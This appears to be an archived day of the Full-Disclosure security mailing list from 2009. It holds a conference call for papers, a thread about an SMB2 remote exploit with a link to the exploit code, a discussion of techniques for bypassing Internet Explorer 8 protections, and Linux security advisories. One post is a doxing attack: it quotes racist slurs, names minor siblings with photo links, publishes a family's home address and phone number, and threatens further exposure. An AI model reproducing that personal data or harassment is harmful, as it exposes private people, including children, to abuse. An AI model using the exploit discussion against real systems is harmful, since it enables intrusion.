From announce at thotcon.org Thu Oct 1 03:38:11 2009 From: announce at thotcon.org (THOTCON Announce) Date: Wed, 30 Sep 2009 21:38:11 -0500 Subject: [Full-disclosure] THOTCON 0x1 - Call For Papers is Open -> October 1, 2009 Message-ID: <4AC41613.7060007@thotcon.org> **************************************** ***BEGIN THOTCON TRANSMISSION*********** What: THOTCON 0x1 When: Friday, April 23, 2010 Where: TBA - 1 Week Prior to Conference Call For Papers Opens: October 1, 2009 Call for Papers Closes: January 1, 2010 *** ABOUT ****************************** THOTCON (pronounced \?th?t\ and taken from THree - One - Two) is a new small venue hacking conference based in Chicago IL, USA. This is a non-profit, non-commercial event looking to provide the best conference possible on a very limited budget. *** WHEN / WHERE *********************** The conference will be held in Chicago, IL USA on April 23, 2010. It will be held at a location only to be disclosed to attendees and speakers during the week before the event. It WILL be in the City of Chicago and close to a CTA train stop, accessible by bus, and cab. *** FORMAT ***************************** The event will be a single track. There will be eight (8) 45 minute talks selected. We will also fill spots between talk with MICROBLOX (quick 12.5 minute talks on a very focused topic) or INFOBLOX (5 minute infomercials on a project you are working on). Topics we are interested in: retro computing, forensics, robotics, physical security, 0-days, application hacking, wireless, malware development/research, hacker spaces, The Muppets, zombies, attack detection, the number 7, online game hacking, consumer device hacking, beer, hacking Olympic bids [using Oprahsploit], and bananas [foster]. *** SPEAKER PERKS ********************** Speakers will be given free admission to the conference as well as one (1) free attendee badge (to bring a guest). In addition, speakers who give their presentation as planned, will be given a THOTCON life-time attendance badge. This means you will be given free entry to every future THOTCON event for life. You will also have access to the THOTCON VIP Lounge. This means you will have access to free stuff and other highly discounted stuff all day. We don't have anything else to give, except you can tell your mom and your friend you spoke at the first THOTCON. *** HOW TO SUBMIT ********************** If you are interested in speaking at this event, please send your completed speaker application to cfp at thotcon.org. Once we receive your submission, you will get an email back within 48-72 hours. If you do not hear back from us, please resend. The CFP will close on Jan 1, 2010 or when we feel we have 8 outstanding talks. We anticipate having all speakers selected by Feb 1, 2010. **************************************** info at thotcon.org http://www.thotcon.org twitter: @thotcon ***END THOTCON TRANSMISSION************* **************************************** From nick58 at gmail.com Thu Oct 1 02:34:29 2009 From: nick58 at gmail.com (Nick) Date: Wed, 30 Sep 2009 19:34:29 -0600 Subject: [Full-disclosure] Microsuck delaying patch for SMB2 on purpose? Message-ID: A new exploit for the _Smb2ValidateProviderCallback() function has been released by the same person who created the Denial of Service exploit, except this one is able to execute code remotely. It seems that ms is sort of delaying the quick fix for this exploit. Whats even sadder is that they knew about it when they developed windows 7 but didn't care to patch windows vista. If they dont release a patch soon, viruses will be all over the internet... Exploit code: http://packetstormsecurity.org/filedesc/smb2_negotiate_func_index.rb.txt.html -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090930/006df1f3/attachment.html From sujay.n at freescale.com Thu Oct 1 12:56:11 2009 From: sujay.n at freescale.com (Nakidi Sujaykumar-B22389) Date: Thu, 1 Oct 2009 17:26:11 +0530 Subject: [Full-disclosure] mudos from pcapr.net Message-ID: <85CECD35406B9744BE61DBA619877D64356B7A@zin33exm29.fsl.freescale.net> Hi All, Any one used "mudos" provided by pcapr.net. Is it possible to generate our own exploit pattern using that tool. If so please provide me the steps to generate the traffic. Thanks & Regards SujayKumar -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/a4e41ec4/attachment.html From quanticle at gmail.com Thu Oct 1 14:09:22 2009 From: quanticle at gmail.com (Rohit Patnaik) Date: Thu, 1 Oct 2009 08:09:22 -0500 Subject: [Full-disclosure] Microsuck delaying patch for SMB2 on purpose? In-Reply-To: References: Message-ID: <6a5e46470910010609p4d324338u713b089c098dfd7f@mail.gmail.com> I'm pretty sure that Microsoft has already released a fix for this. I know they've patched Vista and Windows 7, and they've decided publicly not to backport the fix to Windows XP. --Rohit Patnaik On Wed, Sep 30, 2009 at 8:34 PM, Nick wrote: > A new exploit for the _Smb2ValidateProviderCallback() function has been > released by the same person who created the Denial of Service exploit, > except this one is able to execute code remotely. It seems that ms is sort > of delaying the quick fix for this exploit. Whats even sadder is that they > knew about it when they developed windows 7 but didn't care to patch windows > vista. If they dont release a patch soon, viruses will be all over the > internet... > > Exploit code: > http://packetstormsecurity.org/filedesc/smb2_negotiate_func_index.rb.txt.html > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/a496107f/attachment.html From fd at xu9.de Thu Oct 1 14:22:11 2009 From: fd at xu9.de (Sub) Date: Thu, 01 Oct 2009 15:22:11 +0200 Subject: [Full-disclosure] Microsuck delaying patch for SMB2 on purpose? In-Reply-To: <6a5e46470910010609p4d324338u713b089c098dfd7f@mail.gmail.com> References: <6a5e46470910010609p4d324338u713b089c098dfd7f@mail.gmail.com> Message-ID: <4AC4AD03.9020209@xu9.de> windows xp does not support smb2, so there will never be a patch! ;) Rohit Patnaik schrieb: > I'm pretty sure that Microsoft has already released a fix for this. I > know they've patched Vista and Windows 7, and they've decided publicly > not to backport the fix to Windows XP. > > --Rohit Patnaik > > On Wed, Sep 30, 2009 at 8:34 PM, Nick > wrote: > > A new exploit for the _Smb2ValidateProviderCallback() function has > been released by the same person who created the Denial of Service > exploit, except this one is able to execute code remotely. It > seems that ms is sort of delaying the quick fix for this exploit. > Whats even sadder is that they knew about it when they developed > windows 7 but didn't care to patch windows vista. If they dont > release a patch soon, viruses will be all over the internet... > > Exploit code: > http://packetstormsecurity.org/filedesc/smb2_negotiate_func_index.rb.txt.html > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From r0ck at operamail.com Thu Oct 1 14:33:17 2009 From: r0ck at operamail.com (Chris) Date: Thu, 1 Oct 2009 09:33:17 -0400 Subject: [Full-disclosure] Microsuck delaying patch for SMB2 on purpose? Message-ID: <20091001133317.D267BCBEA7@ws5-11.us4.outblaze.com> "it seems"...and "I'm pretty sure" Is this FD or some fantasyland where everybody can just make up shit? If you don't KNOW and can't CONFIRM (with links or FACTS) then stfu. ----- Original Message ----- From: "Rohit Patnaik" To: Nick Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Microsuck delaying patch for SMB2 on purpose? Date: Thu, 1 Oct 2009 08:09:22 -0500 I'm pretty sure that Microsoft has already released a fix for this. ?I know they've patched Vista and Windows 7, and they've decided publicly not to backport the fix to Windows XP. --Rohit Patnaik On Wed, Sep 30, 2009 at 8:34 PM, Nick wrote: A new exploit for the _Smb2ValidateProviderCallback() function has been released by the same person who created the Denial of Service exploit, except this one is able to execute code remotely. It seems that ms is sort of delaying the quick fix for this exploit. Whats even sadder is that they knew about it when they developed windows 7 but didn't care to patch windows vista.? If they dont release a patch soon, viruses will be all over the internet... Exploit code: http://packetstormsecurity.org/filedesc/smb2_negotiate_func_index.rb.txt.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- _______________________________________________ Surf the Web in a faster, safer and easier way: Download Opera 9 at http://www.opera.com Powered by Outblaze -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/50d140a4/attachment.html From r0ck at operamail.com Thu Oct 1 14:38:46 2009 From: r0ck at operamail.com (Chris) Date: Thu, 1 Oct 2009 07:38:46 -0600 Subject: [Full-disclosure] Modifying SSH to Capture Login Credentials from Attackers Message-ID: <20091001133846.E63D47BD6D@ws5-10.us4.outblaze.com> Same here. RHEL doesn't even have "/var/log/auth". We call it /var/log/secure - which is 0600: -rw------- 1 root root 509 Oct 1 09:37 secure > ----- Original Message ----- > From: "bodik at civ.zcu.cz" > To: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] Modifying SSH to Capture Login Credentials from Attackers > Date: Wed, 30 Sep 2009 00:03:51 +0200 > > > > All standard users have read access to /var/log/auth, so if root > > they shouldn't, at least on my default debian they don't ... > > b > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- _______________________________________________ Surf the Web in a faster, safer and easier way: Download Opera 9 at http://www.opera.com Powered by Outblaze From gdfuego at gmail.com Thu Oct 1 15:33:46 2009 From: gdfuego at gmail.com (G. D. Fuego) Date: Thu, 1 Oct 2009 10:33:46 -0400 Subject: [Full-disclosure] Microsuck delaying patch for SMB2 on purpose? In-Reply-To: <6a5e46470910010609p4d324338u713b089c098dfd7f@mail.gmail.com> References: <6a5e46470910010609p4d324338u713b089c098dfd7f@mail.gmail.com> Message-ID: <07E8440F-4E21-4552-902E-0981899357B8@gmail.com> It sounds like you're talking about the tcp/ip stack flaws rather than the smb2 issue. On Oct 1, 2009, at 9:09 AM, Rohit Patnaik wrote: > I'm pretty sure that Microsoft has already released a fix for this. > I know they've patched Vista and Windows 7, and they've decided > publicly not to backport the fix to Windows XP. > > --Rohit Patnaik > > On Wed, Sep 30, 2009 at 8:34 PM, Nick wrote: > A new exploit for the _Smb2ValidateProviderCallback() function has > been released by the same person who created the Denial of Service > exploit, except this one is able to execute code remotely. It seems > that ms is sort of delaying the quick fix for this exploit. Whats > even sadder is that they knew about it when they developed windows 7 > but didn't care to patch windows vista. If they dont release a > patch soon, viruses will be all over the internet... > > Exploit code: http://packetstormsecurity.org/filedesc/smb2_negotiate_func_index.rb.txt.html > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/b0c64598/attachment.html From fred.vicious at gmail.com Thu Oct 1 15:52:39 2009 From: fred.vicious at gmail.com (Freddie Vicious) Date: Thu, 1 Oct 2009 07:52:39 -0700 Subject: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8 Message-ID: Microsoft has released Internet Explorer 8 on March 19, 2009 and up to now there's no reliable method to exploit memory corruption vulnerabilities on it? I mean, on IE6 and IE7 we had SkyLined heap spray technique, first seen in the IFRAME overflow exploit [1] which have been used by almost every IE memory corruption exploit so far. Internet Explorer 8 was enhanced with DEP and ASLR protections, making heap spray useless. Then Mark Dowd and Alexander Sotirov published their great paper - Bypassing Browser Memory Protections [2] providing some excellent techniques, mainly the .NET binary technique which bypasses DEP and ASLR which was used by Nils on the latest Pwn2Own to own Internet Explorer 8 RC (Release Candidate) [3] and was used to mass-exploit other vulnerabilities [4]. One day after Nils owned IE8RC, Microsoft released Internet Explorer 8 RTM and blocked the option to load .NET DLL?s from Internet zone and Restricted sites zone. Due to the fact that most of IE exploitation doesn?t occur in Intranet/Trusted sites/Local machine zone, this makes the .NET DLL technique irrelevant most of the times. So my question is - Is there no reliable method to exploit memory corruption vulnerabilities in Internet Explorer 8? [1] http://milw0rm.com/exploits/612 [2] http://taossa.com/archive/bh08sotirovdowd.pdf [3] http://dvlabs.tippingpoint.com/blog/2009/03/18/pwn2own-2009-day-1---safari-internet-explorer-and-firefox-taken-down-by-four-zero-day-exploits [4] http://milw0rm.com/exploits/8969 -- Best wishes, Freddie Vicious -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/3c55e945/attachment.html From fred.vicious at gmail.com Thu Oct 1 15:59:55 2009 From: fred.vicious at gmail.com (Freddie Vicious) Date: Thu, 1 Oct 2009 07:59:55 -0700 Subject: [Full-disclosure] Microsuck delaying patch for SMB2 on purpose? In-Reply-To: References: Message-ID: This vulnerability is still unpatched and the exploit was written by Stephen Fewer and H D Moore, not by Laurent Gaffie, the original bug finder. On Wed, Sep 30, 2009 at 6:34 PM, Nick wrote: > A new exploit for the _Smb2ValidateProviderCallback() function has been > released by the same person who created the Denial of Service exploit, > except this one is able to execute code remotely. It seems that ms is sort > of delaying the quick fix for this exploit. Whats even sadder is that they > knew about it when they developed windows 7 but didn't care to patch windows > vista. If they dont release a patch soon, viruses will be all over the > internet... > > Exploit code: > http://packetstormsecurity.org/filedesc/smb2_negotiate_func_index.rb.txt.html > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Best wishes, Freddie Vicious -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/df271e46/attachment.html From jared.demott at harris.com Thu Oct 1 16:27:22 2009 From: jared.demott at harris.com (Jared DeMott) Date: Thu, 01 Oct 2009 11:27:22 -0400 Subject: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8 In-Reply-To: References: Message-ID: <4AC4CA5A.80705@harris.com> Freddie Vicious wrote: > Microsoft has released Internet Explorer 8 on March 19, 2009 and up to > now there's no reliable method to exploit memory corruption > vulnerabilities on it? > > I mean, on IE6 and IE7 we had SkyLined heap spray technique, first > seen in the IFRAME overflow exploit [1] which have been used by almost > every IE memory corruption exploit so far. Internet Explorer 8 was > enhanced with DEP and ASLR protections, making heap spray useless. > Then Mark Dowd and Alexander Sotirov published their great paper - > Bypassing Browser Memory Protections [2] providing some excellent > techniques, mainly the .NET binary technique which bypasses DEP and > ASLR which was used by Nils on the latest Pwn2Own to own Internet > Explorer 8 RC (Release Candidate) [3] and was used to mass-exploit > other vulnerabilities [4]. One day after Nils owned IE8RC, Microsoft > released Internet Explorer 8 RTM and blocked the option to load .NET > DLL?s from Internet zone and Restricted sites zone. Due to the fact > that most of IE exploitation doesn?t occur in Intranet/Trusted > sites/Local machine zone, this makes the .NET DLL technique irrelevant > most of the times. > So my question is - Is there no reliable method to exploit memory > corruption vulnerabilities in Internet Explorer 8? I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved. > > > [1] http://milw0rm.com/exploits/612 > [2] http://taossa.com/archive/bh08sotirovdowd.pdf > [3] > http://dvlabs.tippingpoint.com/blog/2009/03/18/pwn2own-2009-day-1---safari-internet-explorer-and-firefox-taken-down-by-four-zero-day-exploits > [4] http://milw0rm.com/exploits/8969 > > -- > Best wishes, > Freddie Vicious > -- __________________________________________ Jared D. DeMott Principal Security Researcher From fred.vicious at gmail.com Thu Oct 1 17:44:09 2009 From: fred.vicious at gmail.com (Freddie Vicious) Date: Thu, 1 Oct 2009 09:44:09 -0700 Subject: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8 In-Reply-To: <4AC4CA5A.80705@harris.com> References: <4AC4CA5A.80705@harris.com> Message-ID: Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no DEP/ASLR there... But as you said, so far there's no known "catch-all" technique against IE8. Along with other security features ( http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) this basicly means that IE8 is the most secure web browser nowadays? On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott wrote: > > I'm not aware of any catch-all technique just for IE8, though there are > a few common ones like return oriented programming. Application > specific techniques are also common when third party extensions are > involved. > > -- > __________________________________________ > Jared D. DeMott > Principal Security Researcher > > -- Best wishes, Freddie Vicious http://twitter.com/viciousf -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/103357fb/attachment.html From security at mandriva.com Thu Oct 1 18:09:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 01 Oct 2009 19:09:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:253 ] backuppc Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:253 http://www.mandriva.com/security/ _______________________________________________________________________ Package : backuppc Date : October 1, 2009 Affected: Enterprise Server 5.0 _______________________________________________________________________ Problem Description: A vulnerability was discovered and corrected in backuppc: CgiUserConfigEdit in BackupPC 3.1.0, when SSH keys and Rsync are in use in a multi-user environment, does not restrict users from the ClientNameAlias function, which allows remote authenticated users to read and write sensitive files by modifying ClientNameAlias to match another system, then initiating a backup or restore (CVE-2009-3369). This update provides a fix for this vulnerability. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3369 _______________________________________________________________________ Updated Packages: Mandriva Enterprise Server 5: 25edbc4c4a61aa034e090e6cb706f322 mes5/i586/backuppc-3.1.0-7.1mdvmes5.noarch.rpm 99e10439faaf116a1195c2fa1e926109 mes5/SRPMS/backuppc-3.1.0-7.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 38bfc11aa57f6dc67715d58eeddad8ad mes5/x86_64/backuppc-3.1.0-7.1mdvmes5.noarch.rpm 99e10439faaf116a1195c2fa1e926109 mes5/SRPMS/backuppc-3.1.0-7.1mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKxLe8mqjQ0CJFipgRApSDAKCQi8TGLj/885wLVIbr9fHETCAcZQCcCHIO 48I9cs/Rs+rmrU+75sVgy2Q= =NhNC -----END PGP SIGNATURE----- From wintermute at hush.com Thu Oct 1 18:14:49 2009 From: wintermute at hush.com (Wintermute) Date: Thu, 01 Oct 2009 12:14:49 -0500 Subject: [Full-disclosure] So weev... Message-ID: <20091001171449.8C18828037@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 How does it feel to be a hypocrite? And we quote: 22:02 im all for white people cleaning up the nigger problem 22:03 i hate niggers 22:03 i hate niggers. Now besides the fact that weev is an annoying little bitch who cannot seem to find better things to do with his time than augment his racist troll persona, there is a larger irony here: he has two younger siblings who are black. Not that we the undersigned have a problem with this, but our spidey sense tells us that weev does not want you to know. Thus, let us present... Chelsea and Anthony Auernheimer! Chelsea started as a college freshman this year. She is smart and she loves animals. More about Chelsea: http://www.zinch.com/z/Nouchii http://timesdispatch.mycapture.com/mycapture/enlarge.asp?image=23447 816&event=745571&CategoryID=20789 (pic) Anthony is a 9th grader. You can follow him on Twitter here: http://twitter.com/Antsauercool. As a picture is also in order for him: http://timesdispatch.mycapture.com/mycapture/enlarge.asp?image=23447 820&event=745571&CategoryID=20789 Now, we would love to know what these two think of their racist asshole brother, but have had the common courtesy not to bother them with our query. We did, however, more than momentarily entertain the idea of getting in touch with weev's parents to attempt to discover what has made him the way he is. Weev's mother (http://imgur.com/AQpSd.jpg) is a board member of the Richmond PTA and made contributions to the Democratic Party last year. She seems like a nice person. His father (http://imgur.com/CEaNX.jpg), on the other hand, is in his mid 40's, has been CEO of Sealpac USA for the last two years, and is by all accounts a great guy. Either parent is available for comment at (804) 355-2889. If you would prefer postal correspondence, letters can be mailed to: 2038 W Grace St Richmond, VA 23220 Now, being the troll that he is, weev has no problem with living a lie. His recent claim, > As I said, I haven't ever committed a crime. I am a truly sinless man. ...is humorous when compared with this admission, delivered while smoking moonrocks: 15:05 does anybody know these russians 15:06 that they are buying up hacked macs for 43 cents an install 15:26 i have access to like 15:26 8k rooted macs 15:26 right now 15:26 and i would like to make a quick $3500 But we cannot really blame the guy. Our hearts goes out to him when we see admissions such as this: 09:50 i gotta get some money 09:50 my cashflow sucks 09:51 whores 09:51 lavish cars 09:51 gigantic places to live Actually, scratch that. We just kind of LOL at the iProphet and imagine him LOLing back. And that is all well and good. Standard operating procedure in the life of a troll, along with playing some Sims, getting high with whatever psychoactives he can get his grubby paws on, making stupid videos, and generally proving that he does not know what the fuck he is doing with his life. Is weev's current life better than his past attempt at freelance web and graphic design? Maybe. He kinda sucked at that too. But come on, man, at least aspire to *something*. Weev, the joke is old. Your number is up. Shut up or shape up. Your docs have been pulled. We are ready to drop them at a moment's notice, but we momentarily stop to wonder if it would even be worth it. The devil is in the details, and yours have cocked the gun that has been aimed at your foot for a while. Karma has more butthurt waiting for you (in the form of "us") than you know what to do with. Oh, and a representative in Anaheim has been alerted and will be handling this case personally. We are, as always, the collective. An agent is standing by to assist you with any contentions, queries, or comments resulting from this transmission. WINTERMUTE -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkrE44kACgkQAN7xmh8YPB2wrQP/QNzi1E+IfPvbVJr6wsxs9+wjknqe Qc3UAC6hSW3xPB7kwDR9g9i0WUhCjlMO9f78YXDkW0xqJ33FWhpj0zQHwmtOp7rMSXie MeeHIihWf/T5tcPBgNPOqFIqjIWm/GiGcQXrn7Ifmd2+lDZ3vf9nK2/lsgSUyPqPVtge 20blkg8= =JvuW -----END PGP SIGNATURE----- From fred.vicious at gmail.com Thu Oct 1 18:49:17 2009 From: fred.vicious at gmail.com (Freddie Vicious) Date: Thu, 1 Oct 2009 10:49:17 -0700 Subject: [Full-disclosure] So weev... In-Reply-To: <20091001171449.8C18828037@smtp.hushmail.com> References: <20091001171449.8C18828037@smtp.hushmail.com> Message-ID: And we should give a damn because? On Thu, Oct 1, 2009 at 10:14 AM, Wintermute wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > How does it feel to be a hypocrite? And we quote: > > 22:02 im all for white people cleaning up the nigger problem > 22:03 i hate niggers > 22:03 i hate niggers. > > Now besides the fact that weev is an annoying little bitch who > cannot seem to find better things to do with his time than augment > his racist troll persona, there is a larger irony here: he has two > younger siblings who are black. Not that we the undersigned have a > problem with this, but our spidey sense tells us that weev does not > want you to know. Thus, let us present... > > Chelsea and Anthony Auernheimer! Chelsea started as a college > freshman this year. She is smart and she loves animals. More about > Chelsea: > > http://www.zinch.com/z/Nouchii > http://timesdispatch.mycapture.com/mycapture/enlarge.asp?image=23447 > 816&event=745571&CategoryID=20789 (pic) > > Anthony is a 9th grader. You can follow him on Twitter here: > http://twitter.com/Antsauercool. As a picture is also in order for > him: > http://timesdispatch.mycapture.com/mycapture/enlarge.asp?image=23447 > 820&event=745571&CategoryID=20789 > > Now, we would love to know what these two think of their racist > asshole brother, but have had the common courtesy not to bother > them with our query. We did, however, more than momentarily > entertain the idea of getting in touch with weev's parents to > attempt to discover what has made him the way he is. Weev's mother > (http://imgur.com/AQpSd.jpg) is a board member of the Richmond PTA > and made contributions to the Democratic Party last year. She seems > like a nice person. His father (http://imgur.com/CEaNX.jpg), on the > other hand, is in his mid 40's, has been CEO of Sealpac USA for the > last two years, and is by all accounts a great guy. Either parent > is available for comment at (804) 355-2889. If you would prefer > postal correspondence, letters can be mailed to: > > 2038 W Grace St > Richmond, VA 23220 > > Now, being the troll that he is, weev has no problem with living a > lie. His recent claim, > > > As I said, I haven't ever committed a crime. I am a truly sinless > man. > > ...is humorous when compared with this admission, delivered while > smoking moonrocks: > > 15:05 does anybody know these russians > 15:06 that they are buying up hacked macs for 43 cents an > install > 15:26 i have access to like > 15:26 8k rooted macs > 15:26 right now > 15:26 and i would like to make a quick $3500 > > But we cannot really blame the guy. Our hearts goes out to him when > we see admissions such as this: > > 09:50 i gotta get some money > 09:50 my cashflow sucks > 09:51 whores > 09:51 lavish cars > 09:51 gigantic places to live > > Actually, scratch that. We just kind of LOL at the iProphet and > imagine him LOLing back. > > And that is all well and good. Standard operating procedure in the > life of a troll, along with playing some Sims, getting high with > whatever psychoactives he can get his grubby paws on, making stupid > videos, and generally proving that he does not know what the fuck > he is doing with his life. Is weev's current life better than his > past attempt at freelance web and graphic design? Maybe. He kinda > sucked at that too. But come on, man, at least aspire to > *something*. > > Weev, the joke is old. Your number is up. Shut up or shape up. Your > docs have been pulled. We are ready to drop them at a moment's > notice, but we momentarily stop to wonder if it would even be worth > it. The devil is in the details, and yours have cocked the gun that > has been aimed at your foot for a while. Karma has more butthurt > waiting for you (in the form of "us") than you know what to do > with. Oh, and a representative in Anaheim has been alerted and will > be handling this case personally. > > We are, as always, the collective. An agent is standing by to > assist you with any contentions, queries, or comments resulting > from this transmission. > > WINTERMUTE > -----BEGIN PGP SIGNATURE----- > Charset: UTF8 > Version: Hush 3.0 > Note: This signature can be verified at https://www.hushtools.com/verify > > wpwEAQMCAAYFAkrE44kACgkQAN7xmh8YPB2wrQP/QNzi1E+IfPvbVJr6wsxs9+wjknqe > Qc3UAC6hSW3xPB7kwDR9g9i0WUhCjlMO9f78YXDkW0xqJ33FWhpj0zQHwmtOp7rMSXie > MeeHIihWf/T5tcPBgNPOqFIqjIWm/GiGcQXrn7Ifmd2+lDZ3vf9nK2/lsgSUyPqPVtge > 20blkg8= > =JvuW > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Best wishes, Freddie Vicious http://twitter.com/viciousf -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091001/e2ccb139/attachment.html From security at mandriva.com Thu Oct 1 19:26:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 01 Oct 2009 20:26:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:254 ] graphviz Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:254 http://www.mandriva.com/security/ _______________________________________________________________________ Package : graphviz Date : October 1, 2009 Affected: 2008.1, 2009.0, Corporate 4.0, Enterprise Server 5.0 _______________________________________________________________________ Problem Description: A vulnerability was discovered and corrected in graphviz: Stack-based buffer overflow in the push_subg function in parser.y (lib/graph/parser.c) in Graphviz 2.20.2, and possibly earlier versions, allows user-assisted remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a DOT file with a large number of Agraph_t elements (CVE-2008-4555). This update provides a fix for this vulnerability. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4555 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 438c0a99edd76117c5f8f414483ba2cf 2008.1/i586/graphviz-2.16.1-3.2mdv2008.1.i586.rpm dfb121bb5029b7e9d7a4695bf76a1413 2008.1/i586/graphviz-doc-2.16.1-3.2mdv2008.1.i586.rpm 549ac8639eb441968824a737825bbbfd 2008.1/i586/libgraphviz4-2.16.1-3.2mdv2008.1.i586.rpm 055b0a9ea5a6d9c2bb52cdd24736466c 2008.1/i586/libgraphviz-devel-2.16.1-3.2mdv2008.1.i586.rpm 0a4d296f3280eed23ee466df6e491068 2008.1/i586/libgraphvizlua0-2.16.1-3.2mdv2008.1.i586.rpm 969e8bcb8e2fd7dbd0dc18e1bba81a12 2008.1/i586/libgraphvizocaml0-2.16.1-3.2mdv2008.1.i586.rpm 1502294cefc214c5303d62f08f3dd79e 2008.1/i586/libgraphvizperl0-2.16.1-3.2mdv2008.1.i586.rpm 3512049a131159102e2bc613496c189f 2008.1/i586/libgraphvizphp0-2.16.1-3.2mdv2008.1.i586.rpm f1dd75279c2deddec3bac08f787148a6 2008.1/i586/libgraphvizpython0-2.16.1-3.2mdv2008.1.i586.rpm e4cc9bfd988204f3cda765d9b2b5f6b4 2008.1/i586/libgraphvizr0-2.16.1-3.2mdv2008.1.i586.rpm 07b0369439dfbfdf13e1f81333053330 2008.1/i586/libgraphvizruby0-2.16.1-3.2mdv2008.1.i586.rpm b2da0ab31141bac72991913b2ba5af11 2008.1/i586/libgraphviz-static-devel-2.16.1-3.2mdv2008.1.i586.rpm 17c5d030e390edeaa499afb227c2a918 2008.1/i586/libgraphviztcl0-2.16.1-3.2mdv2008.1.i586.rpm e1ec78ea74f83f3a76bf3a2840634612 2008.1/SRPMS/graphviz-2.16.1-3.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 1d03179cba939f845767e5c53f55a3ac 2008.1/x86_64/graphviz-2.16.1-3.2mdv2008.1.x86_64.rpm 7f909c2527993dfc6fb52a99ba7d40bf 2008.1/x86_64/graphviz-doc-2.16.1-3.2mdv2008.1.x86_64.rpm 3a7a535f08e5d452c00615970ef681f4 2008.1/x86_64/lib64graphviz4-2.16.1-3.2mdv2008.1.x86_64.rpm 1031c334336b37483bd78743ac996d31 2008.1/x86_64/lib64graphviz-devel-2.16.1-3.2mdv2008.1.x86_64.rpm aeb9e97aef30819f6900ad0ac36ff7ba 2008.1/x86_64/lib64graphvizlua0-2.16.1-3.2mdv2008.1.x86_64.rpm 52a9857f11e80c8003e41c6e5a38327e 